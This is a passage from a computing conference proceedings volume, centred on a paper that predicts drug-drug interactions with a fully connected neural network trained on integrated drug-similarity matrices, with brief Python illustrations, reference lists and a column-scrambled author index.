system through feature selection analysis and building hybrid efficient model. Journal of
Computer Science, 25(2018), 152–160.
16. Bhattacharjee, P. S., Fujail, A. K. M., & Begum, S. A. (2017). Intrusion detection system for
NSL-KDD data set using vectorised fitness function in genetic algorithm. The Advances in
Computational Sciences and Technology, 10(2017), 235–246.
17. Pande S., Khamparia A., Gupta D., & Thanh D. N. H. (2021) DDOS Detection using machine
learning technique. In A. Khanna, A. K. Singh, & A. Swaroop (Eds.), Recent studies on compu-
tational intelligence. Studies in computational intelligence (Vol. 921). Springer. https://doi.org/
10.1007/978-981-15-8469-5_5
18. Pande, S. D., & Khamparia, A. (2019). A review on detection of DDOS attack using machine
learning and deep learning techniques. Think India Journal, 2035–2043.
19. Pande, S., & Gadicha, A. B. (2015). Prevention mechanism on DDOS attacks by using multi-
level filtering of distributed firewalls. International Journal on Recent and Innovation Trends
in Computing and Communication, 3(3). ISSN: 2321-8169.
Drug-Drug Interaction Prediction Based
on Drug Similarity Matrix Using a Fully
Connected Neural Network

Alok Kumar and Moolchand Sharma

Abstract Drug-drug interactions (DDIs) are a major hindrance to providing safe and inexpensive health care. They generally occur in patients under extensive medication who take multiple drugs at a time. DDIs can cause side effects ranging from mild to severe health issues among patients. This reduces patients' quality of life and increases hospital healthcare expenses by lengthening the recovery period. To resolve this problem, many efforts have been made to develop new techniques for DDI prediction. In this article, we propose a method of predicting DDIs based on the similarity of drugs, which includes chemical similarity, distance-based similarity, side effects, ligand similarity, etc., using a fully connected neural network model. Our model was able to achieve a competitive AUC score ranging from 0.72 to 0.77 and a PR AUC from 0.68 to 0.73 when tested on three gold standard datasets in k-fold cross-validation.
Keywords Drug-drug interaction · Chemical similarity · Ligand similarity · AUC · Cross-validation

1 Introduction

Combining multiple drugs to treat severe diseases like cancer, AIDS, etc., is becoming
a promising and common approach in the modern era. The main reason behind using
multiple drugs to treat a disease is that it increases the treatment process’s efficacy,
and different drugs can tackle a different part of the treatment process [1]. However,
these combinations may result in unwanted interactions between the drugs, which can
cause adverse drug reactions [2]. Hence, the importance of predicting DDIs in human
health is immense [3].

A. Kumar
Goibibo Private Limited, Bangalore, India
M. Sharma (B)
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: moolchand@mait.ac.in

Researchers and organizations worldwide have spent ample time and money to find DDI pairs using several in vivo and in vitro experimental techniques [4]. The experimental methods for determining DDIs are extremely slow, requiring a lot of time and money. They usually yield low throughput, due to which some interactions may go unnoticed. As these procedures are extremely slow and expensive, they are not feasible for screening large combinations of drugs. Numerous new techniques for predicting DDIs have come into the picture over the past decade to overcome this problem.
Vilar et al. propose a protocol for predicting novel DDIs based on the candidates' similarity to known DDIs [5]. A method to predict DDIs by modeling interaction profile fingerprints was also proposed by Vilar et al. [6]. A small pool of 928 drugs was considered in this approach, and their interaction profile fingerprints (IPFs) were calculated. Then, a similarity matrix corresponding to the IPFs was generated using the Jaccard index. To calculate the predicted interactions, the established DDI matrix was multiplied with the similarity matrix.
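As a rough illustration of this idea, the sketch below builds a Jaccard similarity matrix from a binary interaction matrix (using the known-interaction rows as stand-ins for the IPFs) and multiplies the two, so that candidate scores are accumulated from the known interactions of similar drugs. The toy matrix and the exact scoring rule are a simplification of the approach in [6], not a reproduction of the original protocol.

```python
import numpy as np

def jaccard_matrix(profiles: np.ndarray) -> np.ndarray:
    """Pairwise Jaccard similarity between binary row vectors (interaction profiles)."""
    inter = profiles @ profiles.T                            # |A ∩ B|
    row_sums = profiles.sum(axis=1)
    union = row_sums[:, None] + row_sums[None, :] - inter    # |A ∪ B|
    with np.errstate(divide="ignore", invalid="ignore"):
        return np.where(union > 0, inter / union, 0.0)

# Toy known-DDI matrix M (symmetric 0/1); its rows double as the drugs' profiles
M = np.array([[0, 1, 1, 0],
              [1, 0, 0, 1],
              [1, 0, 0, 0],
              [0, 1, 0, 0]], dtype=float)

S = jaccard_matrix(M)           # drug-drug similarity from interaction profiles
scores = M @ S                  # candidate scores propagated through similar drugs
np.fill_diagonal(scores, 0.0)   # self-interactions are not considered
print(np.round(scores, 2))
```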
Gottlieb et al. present a method to predict DDI considering the structural similarity
and side effects of known drug pairs [7]. Lee et al. propose a model to predict DDI
using a feed-forward deep neural network that takes reduced similarity profiles gener-
ated from autoencoders as input [8]. Cheng et al. created drug-drug similarity pairs
based on multiple features and applied five predictive models based on naive Bayes,
decision tree, k-nearest neighbor, logistic regression, and support vector machine
[9]. Zhang et al. proposed a method for finding DDI by applying a label propaga-
tion algorithm on a network of structural and side effect similarity of drugs [10].
A dependency-based convolutional neural network (DCNN) for predicting DDI is
proposed by Liu et al. [11]. In this model, DCNN was used to extract DDIs in short
sentences, and a CNN-based model was implemented to extract DDIs over long distances, since most dependency-based parsers work well only for short sentences. A recursive neural network-based model has been proposed by Lim et al. for predicting DDIs [12]. The model uses a position feature, a subtree containment feature, and an ensemble method to perform DDI extraction. In this work, we likewise propose a neural network-based model.
We have proposed a model made of a fully connected neural network to predict this. Our model uses as input an integrated similarity matrix built following the approach proposed by Olayan [13], who describes a heuristic process to obtain an optimized combination of similarities from the similarity set. The similarity matrix is made by applying this heuristic algorithm to multiple similarity features, such as side effect, offside effect, pathway, and ligand-based similarity, to remove redundancy and find the most optimal similarity subset. The subset obtained after this step is combined to generate an integrated similarity matrix of size m*m, where m is the number of drugs taken into account. This combination is performed using similarity network fusion (SNF) [14]. This method constructs networks of data samples for each available data type and then combines them into a single network that represents the complete spectrum of the given data. Once the integrated similarity matrix is generated, we feed it into our dense neural network. The network is very straightforward and simple, consisting of an input layer made up of 64 neurons, two hidden layers, and an output layer containing two neurons for providing a binary output. Details of the structure and working of the model are discussed in a later section. We trained and tested our model on three gold standard datasets used in numerous research works [7, 15–17]. Our model achieved a competitive AUC score ranging from 0.72 to 0.77 and a PR AUC score from 0.68 to 0.73.
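The actual fusion step uses SNF; as a much simpler stand-in that only shows the shape of the data flowing into the classifier, the sketch below min-max normalizes each m*m similarity matrix and averages them. The drug count and the random toy matrices are hypothetical, and the averaging is not the SNF algorithm of [14].

```python
import numpy as np

def fuse_similarities(similarity_matrices):
    """Naive fusion: scale each m x m similarity matrix to [0, 1] and average them.
    A simplified stand-in for similarity network fusion (SNF), not SNF itself."""
    fused = np.zeros_like(np.asarray(similarity_matrices[0], dtype=float))
    for sim in similarity_matrices:
        sim = np.asarray(sim, dtype=float)
        lo, hi = sim.min(), sim.max()
        fused += (sim - lo) / (hi - lo) if hi > lo else np.zeros_like(sim)
    return fused / len(similarity_matrices)

# Hypothetical inputs: one symmetric m x m matrix per similarity type
m = 548                                        # number of drugs in DS1
rng = np.random.default_rng(0)
chem_sim = rng.random((m, m)); chem_sim = (chem_sim + chem_sim.T) / 2
side_sim = rng.random((m, m)); side_sim = (side_sim + side_sim.T) / 2

integrated = fuse_similarities([chem_sim, side_sim])
print(integrated.shape)                        # (548, 548) integrated similarity matrix
```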
The key highlights of the paper include:
• The paper helps identify interactions between different kinds of drugs during the process of multidrug treatment of a patient.
• A method to generate and combine similarity matrices of different drug features has been discussed in this chapter.
• A four-layered neural network model has been proposed for predicting the interaction probability of drugs.
• The model has achieved an AUC score ranging from 0.72 to 0.77 on three gold standard datasets (DS1, DS2, DS3).

2 Dataset

To train and evaluate the performance of our model, we used three standard datasets. These datasets contain a known DDI interaction matrix along with multiple Jaccard similarity matrices. The datasets used in this article have been taken from [17]. The first dataset (DS1) consists of 548 drugs, and their interactions are represented in an n*n matrix whose diagonal elements are zero, as the interaction of a drug with itself is not taken into account. The dataset contains similarity matrices based on eight different characteristics, including chemical similarity data, target data, enzyme data, transporter data, pathway data, indication data, and side effect data.
The second dataset (DS2) consists of 707 drugs and their interaction matrices. In total, this dataset contains 34,412 interactions. Unlike DS1, this dataset only has a similarity matrix based on chemical similarity. The third dataset (DS3) consists of 807 drugs, and their interactions are represented in the form of interaction matrices. This dataset contains seven types of similarity matrices. Four of these similarities are based on the anatomical therapeutic chemical (ATC) classification; the others are based on chemical similarity, ligand-based similarity, and side effects. Gottlieb et al. have shown a general procedure for assembling and validating these datasets [7].

2.1 Sources of Data

The datasets discussed above are created using data extracted from the following
sources.

1. DrugBank—DrugBank contains a vast amount of labeled drug data and a comprehensive list of drug targets and drug action information. It was released in 2006 and has been used extensively to facilitate research involving drug-target and drug-drug interactions [18].
2. KEGG—The Kyoto Encyclopedia of Genes and Genomes (KEGG) is a knowledge base (KB) for the structured study of gene functions. It contains a pathway database with information regarding cellular processes represented in the form of a graph [19].
3. OFFSIDES—A comprehensive database of drug effects [20].
4. PubChem—PubChem is an open-source knowledge base consisting of three primary databases (BioAssay, Compound, and Substance). Information on a broad range of chemical entities, including molecules, carbohydrates, lipids, and amino acids, is present in this knowledge base [21].
5. SIDER—The side effect resource (SIDER) database of drugs and ADRs was created [22] to provide a complete picture for understanding the mechanism of drugs' actions and how they can cause adverse reactions. The latest version of SIDER (SIDER 4) contains data on 1430 drugs, 5880 ADRs, and 140,064 drug-ADR pairs. Apart from this, SIDER also contains a dataset of drug indications extracted using natural language processing. Just like DrugBank, SIDER has also been extensively used in research focusing on drug-target and drug-drug interactions.

3 Methodology

This article proposes a model for predicting DDIs using a deep neural network that takes an integrated similarity vector as input. Creating an integrated similarity matrix has already been done in previous research works [13, 14]. A heuristic approach for generating a subset of similarity matrices is proposed by Olayan, which takes care of redundant data to generate the most optimal subset [13]. Then, similarity network fusion (SNF) [14] is applied to the subset to generate data-sample networks that are combined into a single network, producing an integrated similarity matrix. The vector formed from the similarity matrix and the known interactions is provided as input to our fully connected neural network. Our network consists of one input layer made of 64 neurons, two fully connected hidden layers connected sequentially, and an output layer made up of two neurons for generating binary output. A dropout of 0.5 was applied after the hidden layers to prevent overfitting. We used the relu activation function in all layers except the output layer, in which the sigmoid activation function was used for generating binary output. Our model used binary_crossentropy as the loss function and adam as the optimizer. The model was trained on the DS1 dataset with a standard train-test split of 70 and 30%. We found that our model gave better results during training when trained on the integrated similarity matrix compared to when trained just on chemical similarity. The hyperparameters of the model were tuned
using tenfold cross-validation. The model's summary and architecture are provided in Table 1 and Fig. 1, respectively.

Table 1 Fully connected neural network summary

Layer (type)           Output Shape    Param #
dense (Dense)          (None, 64)      70,080
dropout (Dropout)      (None, 64)      0
dense_1 (Dense)        (None, 32)      2080
dropout_1 (Dropout)    (None, 32)      0
dense_2 (Dense)        (None, 16)      528
dropout_2 (Dropout)    (None, 16)      0
dense_3 (Dense)        (None, 2)       34
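For concreteness, a minimal Keras sketch of the layer stack summarized in Table 1 is given below. The input dimension is left as a parameter (the 70,080 parameters of the first dense layer imply an input vector of length 1094 for DS1), and the 0.5 dropout rate and two-neuron sigmoid output follow the description above; it should be read as an approximation of the setup rather than the authors' exact code.

```python
from tensorflow import keras
from tensorflow.keras import layers

def build_ddi_model(input_dim: int = 1094) -> keras.Model:
    """Fully connected DDI classifier following the layer summary in Table 1."""
    model = keras.Sequential([
        layers.Input(shape=(input_dim,)),
        layers.Dense(64, activation="relu"),
        layers.Dropout(0.5),
        layers.Dense(32, activation="relu"),
        layers.Dropout(0.5),
        layers.Dense(16, activation="relu"),
        layers.Dropout(0.5),
        layers.Dense(2, activation="sigmoid"),   # two sigmoid units for the binary output
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy",
                  metrics=[keras.metrics.AUC()])
    return model

model = build_ddi_model()
model.summary()   # parameter counts should match Table 1 (70,080 / 2,080 / 528 / 34)
```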

Fig. 1 Model architecture



4 Evaluation

Our model was trained on the DS1 dataset, which contains information on eight different similarity characteristics. The model was evaluated using the following metrics: the area under the receiver operating characteristic curve (ROC AUC) and the area under the precision-recall curve (PR AUC). The ROC [23] curve is generated by plotting the true positive rate (Tpr) against the false positive rate (Fpr), as given in Eqs. (1) and (2):

Tpr = Tp / (Tp + Fn)    (1)

Fpr = Fp / (Fp + Tn)    (2)

where Tp = true positives, Tn = true negatives, Fp = false positives, and Fn = false negatives. Similarly, the precision-recall curve is generated by plotting precision against recall, as shown in Eqs. (3) and (4):

Precision = Tp / (Tp + Fp)    (3)

Recall = Tp / (Tp + Fn)    (4)
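In practice, both metrics are usually computed directly from the predicted scores. A small scikit-learn sketch, on made-up labels and scores purely for reference, is shown below.

```python
import numpy as np
from sklearn.metrics import auc, precision_recall_curve, roc_auc_score

# Hypothetical ground-truth labels and predicted interaction probabilities
y_true = np.array([0, 0, 1, 1, 0, 1, 1, 0])
y_score = np.array([0.1, 0.4, 0.35, 0.8, 0.2, 0.7, 0.6, 0.3])

roc_auc = roc_auc_score(y_true, y_score)              # area under the ROC curve
precision, recall, _ = precision_recall_curve(y_true, y_score)
pr_auc = auc(recall, precision)                       # area under the precision-recall curve

print(f"ROC AUC = {roc_auc:.3f}, PR AUC = {pr_auc:.3f}")
```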

5 Results and Discussion

In the experiment, the termination condition was set based on the AUC value: we stopped training once the AUC value peaked for our training dataset. The DS1 dataset was chosen for training the model as it was the most comprehensive, containing similarity matrices based on eight different characteristics. To minimize the chances of obtaining inaccurate prediction scores, we tested our model on datasets completely different from the one on which it was trained. We achieved this by performing a train-test split of the DS1 dataset and introducing two new datasets, DS2 and DS3. Our model gave an AUC score of 0.75 for the test split of the DS1 dataset. This score rose to 0.77 for the test dataset DS3 and showed a slight dip to 0.72 for DS2, whereas the PR AUC score ranged from 0.68 to 0.73. These results are shown in Table 2 and represented as a bar graph in Fig. 2.

Table 2 Performance evaluation of the model on different datasets

Dataset   ROC AUC   PR AUC
DS1       0.75      0.73
DS2       0.72      0.70
DS3       0.77      0.68

Fig. 2 Performance evaluation graph for different datasets

6 Conclusion and Future Scope

Side effects of drug-drug interactions are a big roadblock in the multidrug treatment process. Knowing about these kinds of interactions in advance requires much experimental work. More often than not, these experiments are extremely costly and slow and provide very low throughput. This article has proposed a neural network-based model to predict DDIs using an integrated similarity matrix and known DDI interactions as its input. Using this model, we managed to achieve an accuracy competitive with some other previously proposed models.
Although our model produced a very competitive result, there is still ample scope for improvement. The dataset used for training our model contains interaction and similarity data for fewer than a thousand drugs. This was a compromise made because of the computational limitations we faced. Expanding this dataset can give better accuracy. Although we have tuned the hyperparameters of the network using tenfold cross-validation, better accuracy can be achieved with an even better-tuned network.

References

1. Lucy, D., Roberts, E. O., Corp, N., & Kadam, U. T. (2014). Multi-drug therapy in chronic
condition multimorbidity: A systematic review. Family Practice, 31(6), 654–663. https://doi.
org/10.1093/fampra/cmu056
2. Edwards, I. R., & Aronson, J. K. (2000). Adverse drug reactions: Definitions, diagnosis,
and management. Lancet, 356(9237), 1255–1259. https://doi.org/10.1016/S0140-6736(00)027
99-9 PMID: 11072960.
3. Palleria, C., Di Paolo, A., Giofrè, C., Caglioti, C., Leuzzi, G., Siniscalchi, A., & Gallelli, L.
(2013). Pharmacokinetic drug-drug interaction and their implication in clinical management.
Journal of Research in Medical Sciences: The Official Journal of Isfahan University of Medical
Sciences, 18(7), 601.
4. Boulenc X., Schmider W., Barberan O. (2011). In Vitro/in vivo correlation for drug-drug
interactions. In H. G. Vogel, J. Maas, A. Gebauer (Eds.), Drug discovery and evaluation:
Methods in clinical pharmacology. Springer. https://doi.org/10.1007/978-3-540-89891-7_14.
5. Vilar, S., Uriarte, E., Santana, L., Lorberbaum, T., Hripcsak, G., Friedman, C., & Tatonetti,
N. P. (2014). Similarity-based modelling in large-scale prediction of drug-drug interactions.
Nature Protocols, 9(9), 2147–2163. https://doi.org/10.1038/nprot.2014.151
6. Vilar, S., Uriarte, E., Santana, L., Tatonetti, N. P., & Friedman, C. (2013). Detection of drug-drug
interactions by modelling interaction profile fingerprints. PLoS ONE, 8(3), e58321.
7. Gottlieb, A., Stein, G. Y., Oron, Y., Ruppin, E., & Sharan, R. (2012). INDI: A computational
framework for inferring drug interactions and their associated recommendations. Molecular
System Biology, 8(1), 592.
8. Lee, G., Park, C., & Ahn, J. (2019). Novel deep learning model for more accurate prediction of
drug-drug interaction effects. BMC Bioinformatics, 20, 415. https://doi.org/10.1186/s12859-
019-3013-0
9. Cheng, F., Zhao, Z. (2014). Machine learning-based prediction of drug-drug interactions by
integrating drug phenotypic, therapeutic, chemical, and genomic properties. Journal of Amer-
ican Medical Information Association 21(e2), e278-86. https://doi.org/10.1136/amiajnl-2013-
002512. Epub 2014 Mar 18. PMID: 24644270; PMCID: PMC4173180.
10. Zhang, P., Wang, F., Hu, J., et al. (2015). Label propagation prediction of drug-drug interactions
based on clinical side effects. Science Report, 5, 12339. https://doi.org/10.1038/srep12339
11. Liu, S., Chen, Kai., Chen, Q., & Tang, B. (2016). Dependency-based convolutional neural
network for drug-drug interaction extraction. In 2016 IEEE International Conference on Bioin-
formatics and Biomedicine (BIBM) (pp. 1074-1080). https://doi.org/10.1109/BIBM.2016.782
2671.
12. Lim, S., Lee, K., & Kang, J. (2018). Drug-drug interaction extraction from the literature using
a recursive neural network. PLoS ONE, 13(1), e0190926. https://doi.org/10.1371/journal.pone.
0190926
13. Olayan, R. S., Ashoor, H., & Bajic, V. B. (2018). DDR: Efficient computational method to predict
drug-target interactions using graph mining and machine learning approaches. Bioinformatics
34(7), 1164–1173. https://doi.org/10.1093/bioinformatics/btx731. Erratum in: Bioinformatics.
2018 Nov 1; 34(21), 3779. PMID: 29186331; PMCID: PMC5998943.
14. Wang, B., Mezlini, A. M., Demir, F., Fiume, M., Tu, Z., Brudno, M., Haibe-Kains, B., &
Goldenberg, A. (2014). Similarity network fusion for aggregating data types on a genomic
scale. Natural Methods, 11(3), 333–337. https://doi.org/10.1038/nmeth.2810 Epub 2014 Jan
26 PMID: 24464287.
15. Zhang, W., et al. (2017). Predicting potential drug-drug interactions by integrating chemical,
biological, phenotypic and network data. BMC Bioinformatics, 18, 18.
16. Wan, F., Hong, L., Xiao, A., Jiang, T. & Zeng, J. (2018). Neodti: Neural integration of neigh-
bour information from a heterogeneous network for discovering new drug-target interactions.
bioRxiv 261396.
17. Rohani, N., & Eslahchi, C. (2019). Drug-drug interaction predicting by neural network using
integrated similarity. Science Report, 9, 13645. https://doi.org/10.1038/s41598-019-50121-3

18. Wishart, D. S., Knox, C., Guo, A. C., Cheng, D., Shrivastava, S., Tzur, D., Gautam, B.,
& Hassanali, M. (2008). DrugBank: A knowledgebase for drugs, drug actions and drug
targets. Nucleic Acids Research, 36(Database issue), D901–D906, https://doi.org/10.1093/nar/
gkm958
19. Kanehisa, M., & Goto, S. (2000). KEGG: Kyoto encyclopedia of genes and genomes. Nucleic
Acids Research, 28(1), 27–30. https://doi.org/10.1093/nar/28.1.27
20. Tatonetti, N. P., Ye, P. P., Daneshjou, R., & Altman, R. B. (2012) Data-driven prediction of
drug effects and interactions. Science Translational Medicine 4(125):125ra31. https://doi.org/
10.1126/scitranslmed.3003377.
21. Kim, S., Thiessen, P. A., Cheng, T., Yu, B., Shoemaker, B. A., Wang, J., Bolton, E. E., Wang, Y.,
& Bryant, S. H. (2016). Literature information in PubChem: associations between PubChem
records and scientific articles. Journal of Cheminformatics, 8, 32. https://doi.org/10.1186/s13
321-016-0142-6
22. Kuhn, M., Letunic, I., Jensen, L. J., & Bork, P. (2016). The SIDER database of drugs and side effects. Nucleic Acids Research, 44(D1), D1075–D1079. https://doi.org/10.1093/nar/gkv1075
23. Hajian-Tilaki, K. (2013). Receiver operating characteristic (ROC) curve analysis for medical
diagnostic test evaluation. Caspian Journal of Internal Medicine, 4(2), 627–635.
Author Index

A Choudhary, Nilam, 569


Adhikari, Abhijit, 839 Chug, Anuradha, 509
Agarwal, Drishti, 237
Agarwal, Roopali, 559
Agathiyan, K., 261 D
Ahmed, Maaz, 223 Dahiya, Pankaj, 169, 749
Ahmed, Waseem, 223 Dahiya, Sonika, 757, 769, 793
Alias, Mohd Shukri, 59 Dasmohapatra, Sabyasachi, 617
Ali, Nikhat, 545 Desale, Ketan Sanjay, 157
Amrita, 817 Dhankhar, Sunil, 183
Anand, Vatsala, 449 Dhurandher, Sanjay K., 127
Antony, G. Kabin, 329 Dumka, Ankur, 93
Arora, Neha, 261 Dutta, Krittika, 721
Arya, Vivek, 569

F
B Fraz, Mohammad, 757
Bachate, Ravindra P., 665
Bahadur, Promila, 693, 857
Bhatia, Anshul, 509 G
Bhatia, Rajesh, 291 Garg, Amit Kumar, 645
Bhatt, Arvind Kumar, 1 Garg, Preeti, 315
Bhavani, Dokuparthi Sai Santhoshi, 839 Garg, Srishti, 857
Biradar, Rajashree V., 279 Gazi, Mohammad Danish, 301
Biswas, Sarmista, 423 Goel, Gaurav, 499
Gosain, Anjana, 85, 769
Gourisaria, Mahendra Kumar, 721, 735
C Goyal, S. B., 59
Chakraborty, Sudeshna, 817 Gupta, Arun, 581
Chandra, Girish, 471 Gupta, Ashish, 301
Chandra, Satish, 721 Gupta, Deepak, 899
Chaudhary, Juhi, 409 Gupta, Mayuri, 829
Chauhan, Bhargavi K., 15 Gupta, Megha, 31
Chauhan, Jaisal, 261 Gupta, Mukesh Kumar, 183
Choudhary, Ankur, 605 Gupta, Pallavi, 301

Gupta, Sheifali, 449 N


Nadappattel, Hridya Shiju, 757
Nagrath, Preeti, 237
H Nandini, Durgesh, 879
Hamad, Abdulsattar Abdullah, 329 Nath, Mahendra Prasad, 383

J P
Jacob, Lija, 271 Pande, Sagar, 899
Jain, Shikha, 369 Pandey, Mahima Shanker, 461
Jain, Tanvi, 393 Pandey, Pratibha, 683
Jindal, Rajni, 435 Patel, Dhirenbhai B., 15
Patil, Shashikant, 535
Prabha, Rachna, 683
Prakash, Shiv, 521
K
Pramanik, Rwittika, 735
Kamparia, Aditya, 899
Priyadarshini, Sushree Bibhuprada B., 383,
Kandhoul, Nisha, 127
617
Kashyap, Parul, 341
Kaushik, Vandana Dixit, 247
Khamparia, Aditya, 889
R
Khanna, Ashish, 711
Raghav, S., 49
Khare, Sandali, 735
Rai, Saloni, 645
Khatri, Megha, 169
Rajoriya, Manisha, 301
Kirti, 355
Rajpal, Navin, 355, 369
Koundal, Deepika, 449
Ramachandra, H. V., 49
Krishna, C. Rama, 67
Rama Kishore, R., 31, 315
Kumar, Akshi, 869 Rani, Asha, 879
Kumar, Alok, 911 Rani, Poonam, 93
Kumar, Gaurav, 793 Rani, Sita, 569
Kumar, K. S. Raghu, 279 Rathkanthiwar, Shubhangi, 535
Kumar, Shivam, 817 Ravinder, M., 633
Kumar, Sumit, 499 Reddy, Kandula Balagangadhar, 271
Kurumbanshi, Suresh, 535 Reddy, S. Hareesh, 169
Rishabh, 779
Roy, Ritwik, 749
L
Lutimath, Nagaraj M., 49
S
Sachdeva, Nitin, 869
M Sachdeva, Ravi Kumar, 147
Madan, Kapil, 291 Saha, Anju, 85
Malhotra, Anshu, 435 Sharan, Mudita, 633
Malhotra, Radhika, 1 Sharma, Abhishek, 817
Mangla, Aakash, 237 Sharma, Ashok, 665
Maurya, Archana Sachindeo, 693, 857 Sharma, Megha, 581
Mehta, Purnima Lala, 481 Sharma, Moolchand, 911
Mishra, Anukram, 581 Sharma, Neha, 49
Mishra, Debahuti, 383 Sharma, Priya, 139
Mishra, Prateek, 147 Sharma, Sanjay Kumar, 139
Mittal, Dhruv, 749 Shetty, Mangala, 675
Mittal, Namita, 581 Shetty, Spoorthi, 675
Mohanty, Maitri, 711 Shinde, Swati V., 157
Mohapatra, Ambarish G., 711 Shivani, 67

Shukla, Manoj Kumar, 559 Thivagar, M. Lellis, 329


Shukla, N. K., 521 Tiwari, Arvind Kumar, 103
Shukla, Ratnesh Kumar, 103 Tiwari, Pradeep K., 521
Shukla, Samiksha, 271, 423 Tiwari, Rajeev, 499
Shukla, Satyabrat, 481 Tiwari, Rajesh, 147
Shukla, Shantanu, 593 Tiwari, Shailesh, 605
Singhal, Avi, 749 Tiwari, Usha, 211
Singhal, Prateek, 103 Tripathi, Animesh, 521
Singhal, Yash Kumar, 829 Tripathi, G. S., 683
Singh, Amar, 665 Tripathi, Shailendra K., 211
Singh, Amit Prakash, 509 Tripathy, Pradyumna Kumar, 711
Singh, Amritpal, 889
Singh, Deepika, 85
Singh, Dinesh, 509 V
Singh, Gautam, 481 Verma, Abhishek Singh, 605
Singh, Ravinder Pal, 509 Verma, Deepa, 461
Singh, Vijander, 879 Verma, Sudhani, 471
Singh, Vineeta, 247 Verma, Sudhanshu, 683
Sinha, Adwitiya, 829
Soni, Priyansh, 757
Srivastava, Arpita, 1 Y
Srivastava, Harshit, 211 Yadav, Arnav, 793
Srivastava, Prabhat Kumar, 103 Yadav, Divakar, 199, 471, 593
Srivastava, Priyanka, 1 Yadav, Jyoti, 879
Sumathi, D., 839 Yadav, Jyotsna, 355, 369, 393, 409, 545
Sunar, Somesh, 211 Yadav, Pooja, 199
Suryavanshi, Raghuraj, 199, 593 Yadav, Rishika, 93
Swain, Debabrata, 271 Yadav, Sanjay Kumar, 147
Yadav, Vikas, 93

T
Tamilarasan, B., 329 Z
Taruna, 779 Zaza, Gianluca, 807
